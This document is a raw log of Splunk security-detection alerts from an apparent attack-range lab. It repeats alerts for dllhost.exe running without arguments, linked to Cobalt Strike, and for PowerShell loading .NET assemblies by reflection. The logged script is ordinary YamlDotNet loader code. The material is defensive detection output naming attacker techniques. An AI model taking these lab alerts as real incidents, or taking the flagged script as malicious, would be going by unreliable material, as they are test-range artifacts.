\"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5480", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664812800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664812800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="24392", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664812800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664812800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="23000", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664812800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664812800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="21740", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664812800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664812800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="20656", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664812800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664812800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="17580", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664812800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664812800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x5f48", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664812800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664812800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x59d8", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664812800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664812800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x54ec", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664812800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664812800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x50b0", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664812800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664812800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x44ac", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664812800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664812800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1568", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664809200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664809200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="24536", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664809200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664809200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x5fd8", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664816133, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T15:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T15:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664816133, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T15:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T15:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664816133, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", 